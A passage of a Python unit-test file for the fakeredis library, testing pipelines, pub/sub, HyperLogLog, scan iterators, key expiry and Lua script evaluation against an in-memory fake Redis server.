# after the with statement, but we need to check
# it was reset properly:
self.assertTrue(isinstance(p, redis.client.BasePipeline)
or not p.need_reset)
def test_pipeline_transaction_shortcut(self):
# This example taken pretty much from the redis-py documentation.
self.redis.set('OUR-SEQUENCE-KEY', 13)
calls = []
def client_side_incr(pipe):
calls.append((pipe,))
current_value = pipe.get('OUR-SEQUENCE-KEY')
next_value = int(current_value) + 1
if len(calls) < 3:
# Simulate a change from another thread.
self.redis.set('OUR-SEQUENCE-KEY', next_value)
pipe.multi()
pipe.set('OUR-SEQUENCE-KEY', next_value)
res = self.redis.transaction(client_side_incr, 'OUR-SEQUENCE-KEY')
self.assertEqual([True], res)
self.assertEqual(16, int(self.redis.get('OUR-SEQUENCE-KEY')))
self.assertEqual(3, len(calls))
def test_pipeline_transaction_value_from_callable(self):
def callback(pipe):
# No need to do anything here since we only want the return value
return 'OUR-RETURN-VALUE'
res = self.redis.transaction(callback, 'OUR-SEQUENCE-KEY',
value_from_callable=True)
self.assertEqual('OUR-RETURN-VALUE', res)
def test_pipeline_empty(self):
p = self.redis.pipeline()
self.assertFalse(p)
def test_pipeline_length(self):
p = self.redis.pipeline()
p.set('baz', 'quux').get('baz')
self.assertEqual(2, len(p))
def test_key_patterns(self):
self.redis.mset({'one': 1, 'two': 2, 'three': 3, 'four': 4})
self.assertItemsEqual(self.redis.keys('*o*'),
[b'four', b'one', b'two'])
self.assertItemsEqual(self.redis.keys('t??'), [b'two'])
self.assertItemsEqual(self.redis.keys('*'),
[b'four', b'one', b'two', b'three'])
self.assertItemsEqual(self.redis.keys(),
[b'four', b'one', b'two', b'three'])
def test_ping(self):
self.assertTrue(self.redis.ping())
def test_type(self):
self.redis.set('string_key', "value")
self.redis.lpush("list_key", "value")
self.redis.sadd("set_key", "value")
self.redis.zadd("zset_key", 1, "value")
self.redis.hset('hset_key', 'key', 'value')
self.assertEqual(self.redis.type('string_key'), b'string')
self.assertEqual(self.redis.type('list_key'), b'list')
self.assertEqual(self.redis.type('set_key'), b'set')
self.assertEqual(self.redis.type('zset_key'), b'zset')
self.assertEqual(self.redis.type('hset_key'), b'hash')
self.assertEqual(self.redis.type('none_key'), b'none')
@attr('slow')
def test_pubsub_subscribe(self):
pubsub = self.redis.pubsub()
pubsub.subscribe("channel")
sleep(1)
expected_message = {'type': 'subscribe', 'pattern': None,
'channel': b'channel', 'data': 1}
message = pubsub.get_message()
keys = list(pubsub.channels.keys())
key = keys[0]
if not self.decode_responses:
key = (key if type(key) == bytes
else bytes(key, encoding='utf-8'))
self.assertEqual(len(keys), 1)
self.assertEqual(key, b'channel')
self.assertEqual(message, expected_message)
@attr('slow')
def test_pubsub_psubscribe(self):
pubsub = self.redis.pubsub()
pubsub.psubscribe("channel.*")
sleep(1)
expected_message = {'type': 'psubscribe', 'pattern': None,
'channel': b'channel.*', 'data': 1}
message = pubsub.get_message()
keys = list(pubsub.patterns.keys())
self.assertEqual(len(keys), 1)
self.assertEqual(message, expected_message)
@attr('slow')
def test_pubsub_unsubscribe(self):
pubsub = self.redis.pubsub()
pubsub.subscribe('channel-1', 'channel-2', 'channel-3')
sleep(1)
expected_message = {'type': 'unsubscribe', 'pattern': None,
'channel': b'channel-1', 'data': 2}
pubsub.get_message()
pubsub.get_message()
pubsub.get_message()
# unsubscribe from one
pubsub.unsubscribe('channel-1')
sleep(1)
message = pubsub.get_message()
keys = list(pubsub.channels.keys())
self.assertEqual(message, expected_message)
self.assertEqual(len(keys), 2)
# unsubscribe from multiple
pubsub.unsubscribe()
sleep(1)
pubsub.get_message()
pubsub.get_message()
keys = list(pubsub.channels.keys())
self.assertEqual(message, expected_message)
self.assertEqual(len(keys), 0)
@attr('slow')
def test_pubsub_punsubscribe(self):
pubsub = self.redis.pubsub()
pubsub.psubscribe('channel-1.*', 'channel-2.*', 'channel-3.*')
sleep(1)
expected_message = {'type': 'punsubscribe', 'pattern': None,
'channel': b'channel-1.*', 'data': 2}
pubsub.get_message()
pubsub.get_message()
pubsub.get_message()
# unsubscribe from one
pubsub.punsubscribe('channel-1.*')
sleep(1)
message = pubsub.get_message()
keys = list(pubsub.patterns.keys())
self.assertEqual(message, expected_message)
self.assertEqual(len(keys), 2)
# unsubscribe from multiple
pubsub.punsubscribe()
sleep(1)
pubsub.get_message()
pubsub.get_message()
keys = list(pubsub.patterns.keys())
self.assertEqual(len(keys), 0)
@attr('slow')
def test_pubsub_listen(self):
def _listen(pubsub, q):
count = 0
for message in pubsub.listen():
q.put(message)
count += 1
if count == 4:
pubsub.close()
channel = 'ch1'
patterns = ['ch1*', 'ch[1]', 'ch?']
pubsub = self.redis.pubsub()
pubsub.subscribe(channel)
pubsub.psubscribe(*patterns)
sleep(1)
msg1 = pubsub.get_message()
msg2 = pubsub.get_message()
msg3 = pubsub.get_message()
msg4 = pubsub.get_message()
self.assertEqual(msg1['type'], 'subscribe')
self.assertEqual(msg2['type'], 'psubscribe')
self.assertEqual(msg3['type'], 'psubscribe')
self.assertEqual(msg4['type'], 'psubscribe')
q = Queue()
t = threading.Thread(target=_listen, args=(pubsub, q))
t.start()
msg = 'hello world'
self.redis.publish(channel, msg)
t.join()
msg1 = q.get()
msg2 = q.get()
msg3 = q.get()
msg4 = q.get()
if self.decode_responses:
bpatterns = patterns + [channel]
else:
bpatterns = [pattern.encode() for pattern in patterns]
bpatterns.append(channel.encode())
msg = msg.encode()
self.assertEqual(msg1['data'], msg)
self.assertIn(msg1['channel'], bpatterns)
self.assertEqual(msg2['data'], msg)
self.assertIn(msg2['channel'], bpatterns)
self.assertEqual(msg3['data'], msg)
self.assertIn(msg3['channel'], bpatterns)
self.assertEqual(msg4['data'], msg)
self.assertIn(msg4['channel'], bpatterns)
@attr('slow')
def test_pubsub_listen_handler(self):
def _handler(message):
calls.append(message)
channel = 'ch1'
patterns = {'ch?': _handler}
calls = []
pubsub = self.redis.pubsub()
pubsub.subscribe(ch1=_handler)
pubsub.psubscribe(**patterns)
sleep(1)
msg1 = pubsub.get_message()
msg2 = pubsub.get_message()
self.assertEqual(msg1['type'], 'subscribe')
self.assertEqual(msg2['type'], 'psubscribe')
msg = 'hello world'
self.redis.publish(channel, msg)
sleep(1)
for i in range(2):
msg = pubsub.get_message()
self.assertIsNone(msg) # get_message returns None when handler is used
pubsub.close()
calls.sort(key=lambda call: call['type'])
self.assertEqual(calls, [
{'pattern': None, 'channel': b'ch1', 'data': b'hello world', 'type': 'message'},
{'pattern': b'ch?', 'channel': b'ch1', 'data': b'hello world', 'type': 'pmessage'}
])
@attr('slow')
def test_pubsub_ignore_sub_messages_listen(self):
def _listen(pubsub, q):
count = 0
for message in pubsub.listen():
q.put(message)
count += 1
if count == 4:
pubsub.close()
channel = 'ch1'
patterns = ['ch1*', 'ch[1]', 'ch?']
pubsub = self.redis.pubsub(ignore_subscribe_messages=True)
pubsub.subscribe(channel)
pubsub.psubscribe(*patterns)
sleep(1)
q = Queue()
t = threading.Thread(target=_listen, args=(pubsub, q))
t.start()
msg = 'hello world'
self.redis.publish(channel, msg)
t.join()
msg1 = q.get()
msg2 = q.get()
msg3 = q.get()
msg4 = q.get()
if self.decode_responses:
bpatterns = patterns + [channel]
else:
bpatterns = [pattern.encode() for pattern in patterns]
bpatterns.append(channel.encode())
msg = msg.encode()
self.assertEqual(msg1['data'], msg)
self.assertIn(msg1['channel'], bpatterns)
self.assertEqual(msg2['data'], msg)
self.assertIn(msg2['channel'], bpatterns)
self.assertEqual(msg3['data'], msg)
self.assertIn(msg3['channel'], bpatterns)
self.assertEqual(msg4['data'], msg)
self.assertIn(msg4['channel'], bpatterns)
@attr('slow')
def test_pubsub_binary(self):
if self.decode_responses:
# Reading the non-UTF-8 message will break if decoding
# responses.
return
def _listen(pubsub, q):
for message in pubsub.listen():
q.put(message)
pubsub.close()
pubsub = self.redis.pubsub(ignore_subscribe_messages=True)
pubsub.subscribe('channel\r\n\xff')
sleep(1)
q = Queue()
t = threading.Thread(target=_listen, args=(pubsub, q))
t.start()
msg = b'\x00hello world\r\n\xff'
self.redis.publish('channel\r\n\xff', msg)
t.join()
received = q.get()
self.assertEqual(received['data'], msg)
def test_pfadd(self):
key = "hll-pfadd"
self.assertEqual(
1, self.redis.pfadd(key, "a", "b", "c", "d", "e", "f", "g"))
self.assertEqual(7, self.redis.pfcount(key))
def test_pfcount(self):
key1 = "hll-pfcount01"
key2 = "hll-pfcount02"
key3 = "hll-pfcount03"
self.assertEqual(1, self.redis.pfadd(key1, "foo", "bar", "zap"))
self.assertEqual(0, self.redis.pfadd(key1, "zap", "zap", "zap"))
self.assertEqual(0, self.redis.pfadd(key1, "foo", "bar"))
self.assertEqual(3, self.redis.pfcount(key1))
self.assertEqual(1, self.redis.pfadd(key2, "1", "2", "3"))
self.assertEqual(3, self.redis.pfcount(key2))
self.assertEqual(6, self.redis.pfcount(key1, key2))
self.assertEqual(1, self.redis.pfadd(key3, "foo", "bar", "zip"))
self.assertEqual(3, self.redis.pfcount(key3))
self.assertEqual(4, self.redis.pfcount(key1, key3))
self.assertEqual(7, self.redis.pfcount(key1, key2, key3))
def test_pfmerge(self):
key1 = "hll-pfmerge01"
key2 = "hll-pfmerge02"
key3 = "hll-pfmerge03"
self.assertEqual(1, self.redis.pfadd(key1, "foo", "bar", "zap", "a"))
self.assertEqual(1, self.redis.pfadd(key2, "a", "b", "c", "foo"))
self.assertTrue(self.redis.pfmerge(key3, key1, key2))
self.assertEqual(6, self.redis.pfcount(key3))
def test_scan(self):
# Setup the data
for ix in range(20):
k = 'scan-test:%s' % ix
v = 'result:%s' % ix
self.redis.set(k, v)
expected = self.redis.keys()
self.assertEqual(20, len(expected)) # Ensure we know what we're testing
# Test that we page through the results and get everything out
results = []
cursor = '0'
while cursor != 0:
cursor, data = self.redis.scan(cursor, count=6)
results.extend(data)
self.assertSetEqual(set(expected), set(results))
# Now test that the MATCH functionality works
results = []
cursor = '0'
while cursor != 0:
cursor, data = self.redis.scan(cursor, match='*7', count=100)
results.extend(data)
self.assertIn(b'scan-test:7', results)
self.assertIn(b'scan-test:17', results)
self.assertEqual(2, len(results))
# Test the match on iterator
results = [r for r in self.redis.scan_iter(match='*7')]
self.assertIn(b'scan-test:7', results)
self.assertIn(b'scan-test:17', results)
self.assertEqual(2, len(results))
def test_sscan(self):
# Setup the data
name = 'sscan-test'
for ix in range(20):
k = 'sscan-test:%s' % ix
self.redis.sadd(name, k)
expected = self.redis.smembers(name)
self.assertEqual(20, len(expected)) # Ensure we know what we're testing
# Test that we page through the results and get everything out
results = []
cursor = '0'
while cursor != 0:
cursor, data = self.redis.sscan(name, cursor, count=6)
results.extend(data)
self.assertSetEqual(set(expected), set(results))
# Test the iterator version
results = [r for r in self.redis.sscan_iter(name, count=6)]
self.assertSetEqual(set(expected), set(results))
# Now test that the MATCH functionality works
results = []
cursor = '0'
while cursor != 0:
cursor, data = self.redis.sscan(name, cursor, match='*7', count=100)
results.extend(data)
self.assertIn(b'sscan-test:7', results)
self.assertIn(b'sscan-test:17', results)
self.assertEqual(2, len(results))
# Test the match on iterator
results = [r for r in self.redis.sscan_iter(name, match='*7')]
self.assertIn(b'sscan-test:7', results)
self.assertIn(b'sscan-test:17', results)
self.assertEqual(2, len(results))
def test_hscan(self):
# Setup the data
name = 'hscan-test'
for ix in range(20):
k = 'key:%s' % ix
v = 'result:%s' % ix
self.redis.hset(name, k, v)
expected = self.redis.hgetall(name)
self.assertEqual(20, len(expected)) # Ensure we know what we're testing
# Test that we page through the results and get everything out
results = {}
cursor = '0'
while cursor != 0:
cursor, data = self.redis.hscan(name, cursor, count=6)
results.update(data)
self.assertDictEqual(expected, results)
# Test the iterator version
results = {}
for key, val in self.redis.hscan_iter(name, count=6):
results[key] = val
self.assertDictEqual(expected, results)
# Now test that the MATCH functionality works
results = {}
cursor = '0'
while cursor != 0:
cursor, data = self.redis.hscan(name, cursor, match='*7', count=100)
results.update(data)
self.assertIn(b'key:7', results)
self.assertIn(b'key:17', results)
self.assertEqual(2, len(results))
# Test the match on iterator
results = {}
for key, val in self.redis.hscan_iter(name, match='*7'):
results[key] = val
self.assertIn(b'key:7', results)
self.assertIn(b'key:17', results)
self.assertEqual(2, len(results))
def test_ttl_should_return_minus_one_for_non_expiring_key(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.ttl('foo'), -1)
def test_ttl_should_return_minus_two_for_non_existent_key(self):
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.ttl('foo'), -2)
def test_pttl_should_return_minus_one_for_non_expiring_key(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.pttl('foo'), -1)
def test_pttl_should_return_minus_two_for_non_existent_key(self):
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.pttl('foo'), -2)
def test_persist(self):
self.redis.set('foo', 'bar', ex=20)
self.redis.persist('foo')
self.assertEqual(self.redis.ttl('foo'), -1)
def test_set_existing_key_persists(self):
self.redis.set('foo', 'bar', ex=20)
self.redis.set('foo', 'foo')
self.assertEqual(self.redis.ttl('foo'), -1)
def test_eval_set_value_to_arg(self):
self.redis.eval('redis.call("SET", KEYS[1], ARGV[1])', 1, 'foo', 'bar')
val = self.redis.get('foo')
self.assertEqual(val, b'bar')
def test_eval_conditional(self):
lua = """
local val = redis.call("GET", KEYS[1])
if val == ARGV[1] then
redis.call("SET", KEYS[1], ARGV[2])
else
redis.call("SET", KEYS[1], ARGV[1])
end
"""
self.redis.eval(lua, 1, 'foo', 'bar', 'baz')
val = self.redis.get('foo')
self.assertEqual(val, b'bar')
self.redis.eval(lua, 1, 'foo', 'bar', 'baz')
val = self.redis.get('foo')
self.assertEqual(val, b'baz')
def test_eval_table(self):
lua = """
local a = {}
a[1] = "foo"
a[2] = "bar"
a[17] = "baz"
return a
"""
val = self.redis.eval(lua, 0)
self.assertEqual(val, [b'foo', b'bar'])
def test_eval_table_with_nil(self):
lua = """
local a = {}
a[1] = "foo"
a[2] = nil
a[3] = "bar"
return a
"""
val = self.redis.eval(lua, 0)
self.assertEqual(val, [b'foo'])
def test_eval_table_with_numbers(self):
lua = """
local a = {}
a[1] = 42
return a
"""
val = self.redis.eval(lua, 0)
self.assertEqual(val, [42])
def test_eval_nested_table(self):
lua = """
local a = {}
a[1] = {}
a[1][1] = "foo"
return a
"""
val = self.redis.eval(lua, 0)
self.assertEqual(val, [[b'foo']])
def test_eval_iterate_over_argv(self):
lua = """
for i, v in ipairs(ARGV) do
end
return ARGV
"""
val = self.redis.eval(lua, 0, "a", "b", "c")
self.assertEqual(val, [b"a", b"b", b"c"])
def test_eval_iterate_over_keys(self):
lua = """
for i, v in ipairs(KEYS) do
end
return KEYS
"""
val = self.redis.eval(lua, 2, "a", "b", "c")
self.assertEqual(val, [b"a", b"b"])
def test_eval_mget(self):
self.redis.set('foo1', 'bar1')
self.redis.set('foo2', 'bar2')
val = self.redis.eval('return redis.call("mget", "foo1", "foo2")', 2, 'foo1', 'foo2')
self.assertEqual(val, [b'bar1', b'bar2'])
def test_eval_mget_none(self):
self.redis.set('foo1', None)
self.redis.set('foo2', None)
val = self.redis.eval('return redis.call("mget", "foo1", "foo2")', 2, 'foo1', 'foo2')
self.assertEqual(val, [b'None', b'None'])
def test_eval_mget_not_set(self):
val = self.redis.eval('return redis.call("mget", "foo1", "foo2")', 2, 'foo1', 'foo2')
self.assertEqual(val, [None, None])
def test_eval_hgetall(self):
self.redis.hset('foo', 'k1', 'bar')
self.redis.hset('foo', 'k2', 'baz')
val = self.redis.eval('return redis.call("hgetall", "foo")', 1, 'foo')
sorted_val = sorted([val[:2], val[2:]])
self.assertEqual(
sorted_val,
[[b'k1', b'bar'], [b'k2', b'baz']]
)
def test_eval_hgetall_iterate(self):
self.redis.hset('foo', 'k1', 'bar')
self.redis.hset('foo', 'k2', 'baz')
lua = """
local result = redis.call("hgetall", "foo")
for i, v in ipairs(result) do
end
return result
"""
val = self.redis.eval(lua, 1, 'foo')
sorted_val = sorted([val[:2], val[2:]])
self.assertEqual(
sorted_val,
[[b'k1', b'bar'], [b'k2', b'baz']]
)
def test_eval_list_with_nil(self):
self.redis.lpush('foo', 'bar')
self.redis.lpush('foo', None)
self.redis.lpush('foo', 'baz')
val = self.redis.eval('return redis.call("lrange", KEYS[1], 0, 2)', 1, 'foo')
self.assertEqual(val, [b'baz', b'None', b'bar'])
def test_eval_invalid_command(self):
with self.assertRaises(ResponseError):
self.redis.eval(
'return redis.call("FOO")',
0
)
def test_eval_syntax_error(self):
with self.assertRaises(ResponseError):
self.redis.eval('return "', 0)
def test_eval_runtime_error(self):
with self.assertRaises(ResponseError):
self.redis.eval('error("CRASH")', 0)
def test_eval_more_keys_than_args(self):
with self.assertRaises(ResponseError):
self.redis.eval('return 1', 42)
def test_eval_numkeys_float_string(self):
with self.assertRaises(ResponseError):
self.redis.eval('return KEYS[1]', '0.7', 'foo')
def test_eval_numkeys_integer_string(self):
val = self.redis.eval('return KEYS[1]', "1", "foo")
self.assertEqual(val, b'foo')
def test_eval_numkeys_negative(self):
with self.assertRaises(ResponseError):
self.redis.eval('return KEYS[1]', -1, "foo")
def test_eval_numkeys_float(self):
with self.assertRaises(ResponseError):
self.redis.eval('return KEYS[1]', 0.7, "foo")
def test_eval_global_variable(self):
# Redis doesn't allow script to define global variables
with self.assertRaises(ResponseError):
self.redis.eval('a=10', 0)
def test_eval_global_and_return_ok(self):
# Redis doesn't allow script to define global variables
with self.assertRaises(ResponseError):
self.redis.eval(
'''
a=10
return redis.status_reply("Everything is awesome")
''',
0
)
def test_eval_convert_number(self):
# Redis forces all Lua numbers to integer
val = self.redis.eval('return 3.2', 0)
self.assertEqual(val, 3)
val = self.redis.eval('return 3.8', 0)
self.assertEqual(val, 3)
val = self.redis.eval('return -3.8', 0)
self.assertEqual(val, -3)
def test_eval_convert_bool(self):
# Redis converts true to 1 and false to nil (which redis-py converts to None)
val = self.redis.eval('return false', 0)
self.assertIsNone(val)
val = self.redis.eval('return true', 0)
self.assertEqual(val, 1)
self.assertNotIsInstance(val, bool)
def test_eval_none_arg(self):
val = self.redis.eval('return ARGV[1] == "None"', 0, None)
self.assertTrue(val)
def test_eval_return_error(self):
with self.assertRaises(redis.ResponseError) as cm:
self.redis.eval('return {err="Testing"}', 0)
self.assertIn('Testing', str(cm.exception))
with self.assertRaises(redis.ResponseError) as cm:
self.redis.eval('return redis.error_reply("Testing")', 0)
self.assertIn('Testing', str(cm.exception))
def test_eval_return_ok(self):
val = self.redis.eval('return {ok="Testing"}', 0)
self.assertEqual(val, b'Testing')
val = self.redis.eval('return redis.status_reply("Testing")', 0)
self.assertEqual(val, b'Testing')
def test_eval_return_ok_nested(self):
val = self.redis.eval(
'''
local a = {}
a[1] = {ok="Testing"}
return a
''',
0
)
self.assertEqual(val, [b'Testing'])
def test_eval_return_ok_wrong_type(self):
with self.assertRaises(redis.ResponseError):
self.redis.eval('return redis.status_reply(123)', 0)
def test_eval_pcall(self):
val = self.redis.eval(
'''
local a = {}
a[1] = redis.pcall("foo")
return a
''',
0
)
self.assertIsInstance(val, list)
self.assertEqual(len(val), 1)
self.assertIsInstance(val[0], ResponseError)
def test_eval_pcall_return_value(self):
with self.assertRaises(ResponseError):
self.redis.eval('return redis.pcall("foo")', 0)
def test_eval_delete(self):
self.redis.set('foo', 'bar')
val = self.redis.get('foo')
self.assertEqual(val, b'bar')
val = self.redis.eval('redis.call("DEL", KEYS[1])', 1, 'foo')
self.assertIsNone(val)
def test_eval_exists(self):
val = self.redis.eval('return redis.call("exists", KEYS[1]) == 0', 1, 'foo')
self.assertEqual(val, 1)
def test_eval_flushdb(self):
self.redis.set('foo', 'bar')
val = self.redis.eval(
'''
local value = redis.call("FLUSHDB");
return type(value) == "table" and value.ok == "OK";
''', 0
)
self.assertEqual(val, 1)
def test_eval_flushall(self):
r1 = self.create_redis(db=0)
r2 = self.create_redis(db=1)
r1['r1'] = 'r1'
r2['r2'] = 'r2'
val = self.redis.eval(
'''
local value = redis.call("FLUSHALL");
return type(value) == "table" and value.ok == "OK";
''', 0
)
self.assertEqual(val, 1)
self.assertNotIn('r1', r1)
self.assertNotIn('r2', r2)
def test_eval_incrbyfloat(self):
self.redis.set('foo', 0.5)
val = self.redis.eval(
'''
local value = redis.call("INCRBYFLOAT", KEYS[1], 2.0);
return type(value) == "string" and tonumber(value) == 2.5;
''', 1, 'foo'
)
self.assertEqual(val, 1)
def test_eval_lrange(self):
self.redis.rpush('foo', 'a', 'b')
val = self.redis.eval(
'''
local value = redis.call("LRANGE", KEYS[1], 0, -1);
return type(value) == "table" and value[1] == "a" and value[2] == "b";
''', 1, 'foo'
)
self.assertEqual(val, 1)
def test_eval_ltrim(self):
self.redis.rpush('foo', 'a', 'b', 'c', 'd')
val = self.redis.eval(
'''
local value = redis.call("LTRIM", KEYS[1], 1, 2);
return type(value) == "table" and value.ok == "OK";
''', 1, 'foo'
)
self.assertEqual(val, 1)
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'b', b'c'])
def test_eval_lset(self):
self.redis.rpush('foo', 'a', 'b')
val = self.redis.eval(
'''
local value = redis.call("LSET", KEYS[1], 0, "z");
return type(value) == "table" and value.ok == "OK";
''', 1, 'foo'
)
self.assertEqual(val, 1)
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'z', b'b'])
def test_eval_sdiff(self):
self.redis.sadd('foo', 'a', 'b', 'c', 'f', 'e', 'd')
self.redis.sadd('bar', 'b')
val = self.redis.eval(
'''
local value = redis.call("SDIFF", KEYS[1], KEYS[2]);
if type(value) ~= "table" then
return redis.error_reply(type(value) .. ", should be table");
else
return value;
end
''', 2, 'foo', 'bar')
# Lua must receive the set *sorted*
self.assertEqual(val, [b'a', b'c', b'd', b'e', b'f'])
class TestFakeRedis(unittest.TestCase):
decode_responses = False
def setUp(self):
self.redis = self.create_redis()
def tearDown(self):
self.redis.flushall()
del self.redis
def assertInRange(self, value, start, end, msg=None):
self.assertGreaterEqual(value, start, msg)
self.assertLessEqual(value, end, msg)
def create_redis(self, db=0):
return fakeredis.FakeRedis(db=db)
def test_setex(self):
self.assertEqual(self.redis.setex('foo', 'bar', 100), True)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_setex_using_timedelta(self):
self.assertEqual(
self.redis.setex('foo', 'bar', timedelta(seconds=100)), True)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_lrem_postitive_count(self):
self.redis.lpush('foo', 'same')
self.redis.lpush('foo', 'same')
self.redis.lpush('foo', 'different')
self.redis.lrem('foo', 'same', 2)
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'different'])
def test_lrem_negative_count(self):
self.redis.lpush('foo', 'removeme')
self.redis.lpush('foo', 'three')
self.redis.lpush('foo', 'two')
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'removeme')
self.redis.lrem('foo', 'removeme', -1)
# Should remove it from the end of the list,
# leaving the 'removeme' from the front of the list alone.
self.assertEqual(self.redis.lrange('foo', 0, -1),
[b'removeme', b'one', b'two', b'three'])
def test_lrem_zero_count(self):
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'one')
self.redis.lrem('foo', 'one')
self.assertEqual(self.redis.lrange('foo', 0, -1), [])
def test_lrem_default_value(self):
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'one')
self.redis.lrem('foo', 'one')
self.assertEqual(self.redis.lrange('foo', 0, -1), [])
def test_lrem_does_not_exist(self):
self.redis.lpush('foo', 'one')
self.redis.lrem('foo', 'one')
# These should be noops.
self.redis.lrem('foo', 'one', -2)
self.redis.lrem('foo', 'one', 2)
def test_lrem_return_value(self):
self.redis.lpush('foo', 'one')
count = self.redis.lrem('foo', 'one', 0)
self.assertEqual(count, 1)
self.assertEqual(self.redis.lrem('foo', 'one'), 0)
def test_zadd_deprecated(self):
result = self.redis.zadd('foo', 'one', 1)
self.assertEqual(result, 1)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'one'])
def test_zadd_missing_required_params(self):
with self.assertRaises(redis.RedisError):
# Missing the 'score' param.
self.redis.zadd('foo', 'one')
with self.assertRaises(redis.RedisError):
# Missing the 'value' param.
self.redis.zadd('foo', None, score=1)
with self.assertRaises(redis.RedisError):
self.redis.zadd('foo')
def test_zadd_with_single_keypair(self):
result = self.redis.zadd('foo', bar=1)
self.assertEqual(result, 1)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'bar'])
def test_zadd_with_multiple_keypairs(self):
result = self.redis.zadd('foo', bar=1, baz=9)
self.assertEqual(result, 2)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'bar', b'baz'])
def test_zadd_with_name_is_non_string(self):
result = self.redis.zadd('foo', 1, 9)
self.assertEqual(result, 1)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'1'])
def test_set_nx_doesnt_set_value_twice(self):
self.assertEqual(self.redis.set('foo', 'bar', nx=True), True)
self.assertEqual(self.redis.set('foo', 'bar', nx=True), None)
def test_set_xx_set_value_when_exists(self):
self.assertEqual(self.redis.set('foo', 'bar', xx=True), None)
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.set('foo', 'bar', xx=True), True)
@attr('slow')
def test_set_ex_should_expire_value(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.set('foo', 'bar', ex=1)
sleep(2)
self.assertEqual(self.redis.get('foo'), None)
@attr('slow')
def test_set_px_should_expire_value(self):
self.redis.set('foo', 'bar', px=500)
sleep(1.5)
self.assertEqual(self.redis.get('foo'), None)
@attr('slow')
def test_psetex_expire_value(self):
with self.assertRaises(ResponseError):
self.redis.psetex('foo', 0, 'bar')
self.redis.psetex('foo', 500, 'bar')
sleep(1.5)
self.assertEqual(self.redis.get('foo'), None)
@attr('slow')
def test_psetex_expire_value_using_timedelta(self):
with self.assertRaises(ResponseError):
self.redis.psetex('foo', timedelta(seconds=0), 'bar')
self.redis.psetex('foo', timedelta(seconds=0.5), 'bar')
sleep(1.5)
self.assertEqual(self.redis.get('foo'), None)
@attr('slow')
def test_expire_should_expire_key(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.expire('foo', 1)
sleep(1.5)
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.expire('bar', 1), False)
def test_expire_should_return_true_for_existing_key(self):
self.redis.set('foo', 'bar')
rv = self.redis.expire('foo', 1)
self.assertIs(rv, True)
def test_expire_should_return_false_for_missing_key(self):
rv = self.redis.expire('missing', 1)
self.assertIs(rv, False)
def test_expire_long(self):
self.redis.set('foo', 'bar')
self.redis.expire('foo', long(1))
@attr('slow')
def test_expire_should_expire_key_using_timedelta(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.expire('foo', timedelta(seconds=1))
sleep(1.5)
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.expire('bar', 1), False)
@attr('slow')
def test_expire_should_expire_immediately_with_millisecond_timedelta(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.expire('foo', timedelta(milliseconds=750))
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.expire('bar', 1), False)
@attr('slow')
def test_pexpire_should_expire_key(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.pexpire('foo', 150)
sleep(0.2)
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.pexpire('bar', 1), False)
def test_pexpire_should_return_truthy_for_existing_key(self):
self.redis.set('foo', 'bar')
rv = self.redis.pexpire('foo', 1)
self.assertIs(bool(rv), True)
def test_pexpire_should_return_falsey_for_missing_key(self):
rv = self.redis.pexpire('missing', 1)
self.assertIs(bool(rv), False)
@attr('slow')
def test_pexpire_should_expire_key_using_timedelta(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.pexpire('foo', timedelta(milliseconds=750))
sleep(0.5)
self.assertEqual(self.redis.get('foo'), b'bar')
sleep(0.5)
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.pexpire('bar', 1), False)
@attr('slow')
def test_expireat_should_expire_key_by_datetime(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.expireat('foo', datetime.now() + timedelta(seconds=1))
sleep(1.5)
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.expireat('bar', datetime.now()), False)
@attr('slow')
def test_expireat_should_expire_key_by_timestamp(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.expireat('foo', int(time() + 1))
sleep(1.5)
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.expire('bar', 1), False)
def test_expireat_should_return_true_for_existing_key(self):
self.redis.set('foo', 'bar')
rv = self.redis.expireat('foo', int(time() + 1))
self.assertIs(rv, True)
def test_expireat_should_return_false_for_missing_key(self):
rv = self.redis.expireat('missing', int(time() + 1))
self.assertIs(rv, False)
@attr('slow')
def test_pexpireat_should_expire_key_by_datetime(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.pexpireat('foo', datetime.now() + timedelta(milliseconds=150))
sleep(0.2)
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.pexpireat('bar', datetime.now()), False)
@attr('slow')
def test_pexpireat_should_expire_key_by_timestamp(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
